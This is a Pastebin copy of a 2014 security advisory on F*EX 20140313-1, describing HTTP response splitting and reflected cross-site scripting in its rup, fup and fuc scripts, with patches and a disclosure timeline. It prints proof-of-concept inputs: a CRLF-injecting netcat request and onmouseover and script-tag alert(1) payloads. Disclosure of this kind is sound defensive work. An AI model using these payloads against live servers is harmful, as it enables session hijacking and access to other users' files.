API tools faq
paste
Advertisement
Mayk0

#; F*EX 20140313-1 HTTP Response Splitting / Cross Site S.

Mayk0
Jun 7th, 2014
307
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.31 KB | None | 0 0
raw download clone embed print report
  1. Full title F*EX 20140313-1 HTTP Response Splitting / Cross Site Scripting
  2. Date add 2014-06-06
  3. Category web applications
  4. Platform multiple
  5. Risk [<font color="#FFFF00">Security Risk Medium</font>]
  6. Description F*EX version 20140313-1 suffers from HTTP response splitting and cross site scripting vulnerabilities.
  7. CVE CVE-2014-3875,
  8. CVE-2014-3876,
  9. CVE-2014-3877
  10. ========================================
  11.  
  12. F*EX (Frams' Fast File EXchange) - Multiple Issues
  13. - - ---------------------------------------------------------------------
  14.  
  15. Affected Versions
  16. =================
  17. F*EX (Frams' Fast File EXchange) 20140313-1 as shipped with debian,
  18. version fex-20140530 and later are not affected.
  19.  
  20. Issue Overview
  21. ==============
  22. Technical Risk: medium
  23. Likelihood of Exploitation: high
  24. Vendor: Universität Stuttgart
  25. Vendor URL: http://fex.rus.uni-stuttgart.de/
  26. Credits: LSE Leading Security Experts GmbH employee Eric Sesterhenn
  27. Advisory URL: https://www.lsexperts.de/advisories/lse-2014-05-22.txt
  28. Advisory Status: Public
  29. CVE-Number: CVE-2014-3875, CVE-2014-3876, CVE-2014-3877
  30.  
  31.  
  32.  
  33. Impact
  34. ======
  35. It is possible to attack user sessions and to execute JavaScript in
  36. another users browser. This might enable an attacker to gain access to files
  37. which are intended for other users of the platform.
  38.  
  39.  
  40.  
  41. Issue Description
  42. =================
  43. While conducting an internal evaluation of the software, LSE Leading
  44. Security Experts GmbH discovered multiple, remotely exploitable issues with
  45. F*EX.
  46.  
  47. 1) HTTP Response splitting in rup
  48.  
  49. CVE-Number: CVE-2014-3875
  50.  
  51. When inserting encoded newline characters into a request to rup, additional
  52. HTTP headers can be injected into the reply, as well as new HTML code on the
  53. top of the website.
  54.  
  55. - ----------------8<-------------
  56. $ nc 127.0.0.1 8888
  57. GET /rup?akey=test%0d%0a%0d%0aHELLO HTTP/1.0
  58.  
  59. HTTP/1.1 200 OK
  60. X-Message: OK
  61. Server: fexsrv
  62. Expires: 0
  63. Cache-Control: no-cache
  64. X-Frame-Options: SAMEORIGIN
  65. Set-Cookie: akey=test
  66.  
  67. HELLO; Max-Age=9999; Discard
  68. Content-Type: text/html; charset=UTF-8
  69.  
  70. <html>
  71. <head>
  72. ...
  73. - ----------------8<-------------
  74.  
  75. The same attack is possible using a POST request.
  76.  
  77.  
  78. 2) Cross-Site-Scripting issue in rup
  79.  
  80. CVE-Number: CVE-2014-3876
  81.  
  82. The parameter akey is reflected unfiltered as part of the HTML page. Some
  83. characters are forbidden in the GET parameter due to filtering of the
  84. URL, but this can be circumvented by using a POST parameter.
  85. Nevertheless, this issue is exploitable via the GET parameter alone,
  86. with some user interaction.
  87.  
  88. Opening the following URL opens a popup window, when the cursor
  89. moves over the back link on the bottom of the page:
  90.  
  91. http://127.0.0.1:8888/rup?akey=foo" onmouseover=alert(1) bar="
  92.  
  93. - ----------------8<-------------
  94. <p>
  95. <a href="/foc?akey=wow" onmouseover=alert(1) foo="">back to F*EX
  96. operation control</a>
  97. </body></html>
  98. - ----------------8<-------------
  99.  
  100.  
  101. 3) Cross-Site-Scripting issue in fup
  102.  
  103. CVE-Number: CVE-2014-3877
  104.  
  105. The parameter addto is reflected only slightly filtered back to
  106. the user as part of the HTML page. Some characters are forbidden in the GET
  107. parameter due to filtering of the URL, but this can be circumvented by
  108. using a POST parameter. Nevertheless, this issue is exploitable via the GET
  109. parameter alone, with some user interaction.
  110.  
  111. Opening the following URL opens a popup window, when the cursor
  112. moves over the recipient entry field:
  113.  
  114. http://127.0.0.1:8888/fup?addto=%22onmouseover=alert%281%29;bar=%22
  115.  
  116. - ----------------8<-------------
  117. <tr title="e-mail address or alias"><td>recipient(s):
  118. <td><input type="text" name="to" size="96"
  119. value=""onmouseover=alert(1);bar=""><br>
  120. </tr>
  121. - ----------------8<-------------
  122.  
  123.  
  124.  
  125. 4) Cross-Site-Scripting issue in fuc
  126.  
  127. CVE-Number: CVE-2014-3876
  128.  
  129. The POST parameter disclaimer is reflected back to the user as part of the
  130. HTML page.
  131.  
  132. Setting the disclaimer POST parameter in the change disclaimer
  133. operation (http://127.0.0.1:8888/fuc?
  134. disclaimer=CHANGE&akey=2409d2a55e5acfa407929fb10cb8335f) to the
  135. following value
  136.  
  137. - ----------------8<-------------
  138. '"><script>alert(1)</script>
  139. - ----------------8<-------------
  140.  
  141. will results in the following HTML code, which opens a popup window:
  142.  
  143. - ----------------8<-------------
  144. <pre>
  145. '"><script>alert(1)</script>
  146. </pre>
  147. <p>
  148. - ----------------8<-------------
  149.  
  150. An additional attack is possible using the gm POST parameter, by setting
  151. it to malicious HTML code and supplying a GET parameter group.
  152.  
  153. It looks like other values might be affected as well, since
  154. only limited filtering is performed in the CGI parameter
  155. evaluation.
  156.  
  157.  
  158.  
  159. Temporary Workaround and Fix
  160. ============================
  161. LSE Leading Security Experts GmbH advises to deactivate F*EX until the
  162. vendor
  163. publishes a complete fix. LSE Leading Security Experts GmbH recommends to
  164. implement proper filtering mechanisms for all parameters and the
  165. implementation
  166. of proper output encoding before reflecting values back to the user.
  167.  
  168. 1) HTTP Response splitting in rup
  169.  
  170. - --- rup.orig 2014-05-23 08:50:01.558808000 +0200
  171. +++ rup 2014-05-23 08:55:03.182808000 +0200
  172. @@ -35,6 +35,7 @@ foreach my $v (param) {
  173. $vv =~ s/[<>]//g;
  174. if ($v =~ /^akey$/i) {
  175. $vv =~ s:[/.]::g;
  176. + $vv =~ s/[\W]//g;
  177. $akey = untaint($vv);
  178. } elsif ($v =~ /^(from|user)$/i) {
  179. $from = normalize_address($vv);
  180.  
  181.  
  182. 2) Cross-Site-Scripting issue in rup
  183.  
  184. The patch from 1) is sufficient to fix this issue as well.
  185.  
  186.  
  187. 3) Cross-Site-Scripting issue in fup
  188.  
  189. - --- fup.orig 2014-05-23 09:26:12.514808000 +0200
  190. +++ fup 2014-05-23 09:26:53.794808000 +0200
  191. @@ -2551,7 +2551,7 @@ sub setparam {
  192. $replyto = untaint($replyto);
  193. } elsif ($v eq 'ADDTO') {
  194. $vv =~ s/\s.*//;
  195. - - $vv =~ s/[<>]//g;
  196. + $vv =~ s/[<>"']//g;
  197. $addto = untaint(lc($vv)); # if checkaddress($vv);
  198. } elsif ($v eq 'SUBMIT') {
  199. $submit = $vv;
  200.  
  201.  
  202. 4) Cross-Site-Scripting issue in fuc
  203.  
  204. No workaround from LSE. All parameters need to be filtered properly
  205. and HTML encoded when reflected back to the user.
  206.  
  207.  
  208.  
  209. History
  210. =======
  211. 2014-05-22 Issue discovered
  212. 2014-05-23 Issue reported
  213. 2014-05-23 Vendor reply
  214. 2014-05-26 Internal test version supplied by vendor
  215. 2014-05-26 Vendor releases a patch
  216. 2014-05-30 CVE-Numbers assigned
  217. 2014-06-03 Advisory released
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!